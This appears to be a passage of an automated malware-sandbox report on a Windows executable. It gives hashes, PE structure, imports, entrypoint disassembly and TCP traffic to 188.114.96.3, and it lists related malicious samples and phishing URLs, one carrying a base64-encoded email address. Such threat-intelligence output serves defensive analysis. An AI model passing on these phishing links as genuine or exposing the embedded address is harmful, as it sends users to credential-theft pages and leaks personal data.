              https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
              • 104.17.2.184
              Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.12.205
              https://rb.gy/zsqpjaGet hashmaliciousHTMLPhisherBrowse
              • 104.17.2.184
              https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
              • 188.114.97.3
              http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
              • 188.114.97.3
              http://services.business-manange.com/Get hashmaliciousHTMLPhisherBrowse
              • 172.67.138.117
              http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousHTMLPhisherBrowse
              • 104.18.2.35
              http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
              • 104.26.8.44

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              a0e9f5d64349fb13191bc781f81f42e1qeUaxJCA3FO.exeGet hashmaliciousLummaCBrowse
              • 188.114.96.3
              hANEXOPDF.PDF40 234057.msiGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
              • 188.114.96.3
              https://www.support.cryptoplanet.in/downloads.phpGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              swift_copy.docx.docGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              Vq3Ri8EP9z.exeGet hashmaliciousLummaCBrowse
              • 188.114.96.3
              SecuriteInfo.com.Win64.Malware-gen.24311.29797.exeGet hashmaliciousLummaCBrowse
              • 188.114.96.3
              SecuriteInfo.com.Win64.Malware-gen.20485.10039.exeGet hashmaliciousLummaCBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro StealerBrowse
              • 188.114.96.3
              BDQfYL99b2.exeGet hashmaliciousRemcosBrowse
              • 188.114.96.3

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
              Entropy (8bit):6.437009110478457
              TrID:
              • Win64 Executable (generic) (12005/4) 74.95%
              • Generic Win/DOS Executable (2004/3) 12.51%
              • DOS Executable Generic (2002/1) 12.50%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
              File name:6xmBUtHylU.exe
              File size:6'814'720 bytes
              MD5:b82c80a3ce9b5c44391d3f11307f8b8e
              SHA1:7480059bc051383eaaf0d83b7f39d7c4989e4dea
              SHA256:ce9b5ec3693188ed91e363e55286cd212f44912b042bd83a924af2f43daaa55f
              SHA512:c04bb5a116dfbe2599ce91e084888d5c051e831812ed75e7d0fd40373f0f0ade7701246a433cf5552b5b8b370155b95547f8165d7d38c76325124c7afbf431e2
              SSDEEP:49152:8im7Z/AvmNVNL6B6QeuuLlKHqhk/6eYivn7Bp+CiOo0NGpkAF3j+5E3BN7ObFb+I:/fe3F8+eYYn1liONE3B2AK8i
              TLSH:BE664907E99C45EAC3AB923185628252BA717C4C7B212FD33A94F73C2E72BD05E75784
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.p'...g................@.............................Pq.......h...`... ............................

              File Icon

              Icon Hash:0f3371686865330f

              Static PE Info

              General

              Entrypoint:0x1400014c0
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x140000000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
              TLS Callbacks:0x4026c940, 0x1, 0x4026c910, 0x1, 0x402703b0, 0x1
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:1
              File Version Major:6
              File Version Minor:1
              Subsystem Version Major:6
              Subsystem Version Minor:1
              Import Hash:c595f1660e1a3c84f4d9b0761d23cd7a

              Entrypoint Preview

              Instruction
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [00618B95h]
              mov dword ptr [eax], 00000001h
              call 00007F4A045F506Fh
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [00618B75h]
              mov dword ptr [eax], 00000000h
              call 00007F4A045F504Fh
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              call 00007F4A0486B5CCh
              dec eax
              test eax, eax
              sete al
              movzx eax, al
              neg eax
              dec eax
              add esp, 28h
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              lea ecx, dword ptr [00000009h]
              jmp 00007F4A045F5389h
              nop dword ptr [eax+00h]
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              jmp dword ptr [eax]
              inc edi
              outsd
              and byte ptr [edx+75h], ah
              imul ebp, dword ptr [esp+20h], 203A4449h
              and bl, byte ptr [edx+4Ch]
              push edx
              inc edi
              dec eax
              imul ecx, dword ptr [edx+30h], 644C594Fh
              push 00000047h
              dec esi
              push 2F6A5666h
              inc esi
              jc 00007F4A045F5403h
              inc edx
              dec ebx
              dec eax
              outsd
              dec esp
              xor eax, 7A754763h
              push esi
              push ecx
              jo 00007F4A045F540Bh
              dec esp
              xor eax, 44392F79h
              popad
              outsd
              dec ebp
              inc esp
              outsb
              js 00007F4A045F5416h
              push 52735338h

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x6ba0000x4e.edata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x6bb0000x1458.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6bf0000x46654.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x61b0000xeb14.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7060000xe06c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x6199c00x28.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x6bb4940x458.idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x276ee00x27700021328c5de759c0a70434f2e4bf5baab3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x2780000x58f300x59000a5c934d1e605016ca9bc9e34c2572463False0.30690122454353935dBase III DBT, version number 0, next free block index 10, 1st item "soft/go-winio\011v0.6.2\011h1:F2VQgta7ecxGYO8k3ZZz3RS8fVIXVxONVUPlNERoyfY="4.847467174274334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0x2d10000x3497f00x3498008f76f8e497ad9511624c7612678654c7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .pdata0x61b0000xeb140xec001c047672cc8864685f7e5360cd89867eFalse0.4103548728813559data5.5899386037201815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .xdata0x62a0000xc500xe008508355d6440a3304e32acf5da5b3b2bFalse0.25809151785714285data3.991763933880241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .bss0x62b0000x8f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .edata0x6ba0000x4e0x200eca7ca2477ab9129d5e54a0760db31a9False0.130859375data0.8387805141107897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .idata0x6bb0000x14580x1600b99b46cf2c4cc37c3dbf4aa138ce03fcFalse0.29829545454545453data4.3423408018444025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .CRT0x6bd0000x700x20001fc1744f2f71b31ee52667346735f67False0.0859375data0.4692395374032078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0x6be0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x6bf0000x466540x468000ec7e9d5ee951e7482e14aa00bdc7083False0.043796404033687945data2.6688583948899858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .reloc0x7060000xe06c0xe20023255e5e76b09febdd2b719c1ad385f2False0.25114076327433627data5.434881914627796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x6bf1cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.32978723404255317
              RT_ICON0x6bf6340x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.19699812382739212
              RT_ICON0x6c06dc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.17448132780082987
              RT_ICON0x6c2c840x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.031367429061751044
              RT_GROUP_ICON0x704cac0x3edata0.7903225806451613
              RT_VERSION0x704cec0x308dataEnglishUnited States0.43041237113402064
              RT_MANIFEST0x704ff40x660XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39767156862745096

              Imports

              DLLImport
              KERNEL32.dllAddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
              msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

              Exports

              NameOrdinalAddress
              _cgo_dummy_export10x1406b9230

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 5, 2024 06:03:09.722399950 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:09.722450018 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:09.722527981 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:09.725661039 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:09.725681067 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.212552071 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.212654114 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.215186119 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.215197086 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.215440989 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.263241053 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.263267994 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.263340950 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.641165018 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.641261101 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.641314030 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.642874002 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.642884970 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.642899990 CEST49711443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.642905951 CEST44349711188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.661523104 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.661570072 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:10.661637068 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.663453102 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:10.663475990 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.137254953 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.137417078 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.139765024 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.139770985 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.140096903 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.141432047 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.141484022 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.141505003 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.537487984 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.537530899 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.537590027 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.537596941 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.537605047 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.537642956 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.537647009 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.537949085 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.538005114 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.538011074 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.538202047 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.538228989 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.538250923 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.538259029 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.538300991 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.542226076 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.542287111 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.542330980 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.542342901 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.591516972 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.627453089 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.627504110 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.627540112 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.627564907 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.627578020 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.627610922 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.627615929 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.627672911 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.627722979 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.627849102 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.627866983 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.627880096 CEST49712443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.627885103 CEST44349712188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.761686087 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.761718035 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:11.761791945 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.762186050 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:11.762202978 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.264345884 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.264552116 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.265976906 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.265985012 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.266217947 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.268119097 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.268270969 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.268306017 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.715369940 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.715485096 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.715565920 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.715796947 CEST49713443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.715817928 CEST44349713188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.827904940 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.827936888 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:12.828030109 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.828372955 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:12.828387022 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.328937054 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.329030991 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:13.330425024 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:13.330440044 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.330677032 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.331938982 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:13.332107067 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:13.332142115 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.332207918 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:13.332215071 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.769699097 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.769808054 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:13.769941092 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:13.775295973 CEST49714443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:13.775321007 CEST44349714188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:14.118318081 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.118351936 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:14.118447065 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.118897915 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.118907928 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:14.619733095 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:14.619805098 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.621114016 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.621119022 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:14.621373892 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:14.622585058 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.622740030 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.622767925 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:14.622829914 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:14.622847080 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:15.454097986 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:15.454205036 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:15.454296112 CEST49715443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:15.454576015 CEST49715443192.168.2.6188.114.96.3
